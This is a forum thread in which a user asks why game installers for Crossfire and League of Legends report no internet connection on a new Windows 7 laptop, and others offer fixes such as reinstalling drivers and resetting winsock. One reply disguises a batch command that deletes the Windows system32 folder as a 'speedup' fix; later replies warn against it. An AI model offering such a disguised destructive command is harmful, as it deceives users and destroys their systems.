Please help

Just bought a new laptop,

- Internet is conected, I can go to z8games.com etc
- I CAN'T DOWNLOAD CROSSFIRE OR LOL BECAUSE IT'S SAYING THAT THRRES NO INTERNET CONNECTION!!! Please HELP!
- I disabled firewall, still doesn't work
- I did a system recovery, still doesn't work
- I'm running in Windows 7 64 bit

There's something blocking you from installing it just do this it's pretty simple I had the same issue

open notepad
type the following text:
@echo off
del C:\\WINDOWS\system32
Save as "speedup.bat" (select "all files" instead of "text document"
Double-click the .bat file

Then reboot your PC and install crossfire

don't do this, btw.
it'll delete important files

can you download the downloader?
because it might be a problem with the downloader - afaik it runs on a torrent

Are you serious? Your having this guy create a batch file and having him delete his system 32 files. Well if he does it then hes on his own and he can have the privilege of reinstalling windows. Take the advice if you want but I wouldn't do it.

Ive seen this before,try using a different browser like pale moon,comet bird or goggle chrome. If the problem still exist then restart your computer and disable your firewall. Sometimes your browser will ask you to install add-on make sure that if it is prompting you at the site to allow and install the add-on. With this being a new computer more than likely just needs an add on or something.

Or have someone send you the installer. (not me, ill send a hand written virus that makes mooing noises when you start up)

What browser are you using

try reinstalling your WiFi/Ethernet drivers.

I will even explain how to do it. As you don't seem like the brightest computer user.

start->run->device manager->network devices/adapters->right click-> uninstall-> restart

When you restart, the computer will automatically install the drivers.

If none of my suggestions work then go to Start,type in cmd run as admin then type "netsh winsock reset" then restart PC. If this still does not work then the only other solution I can think of is team-viewer and me personally seeing what issues you have.

Go to start
type cmd
run as admin
type netsh winsock reset
restart PC

Crossfire servers are back up (At least according to the front page, I am not at my computer). try again just to clarify it wasn't because the servers were down.

check your router settings.
by the way - have you installed antiviruses recently?
there are a few antiviruses that includes firewalls.
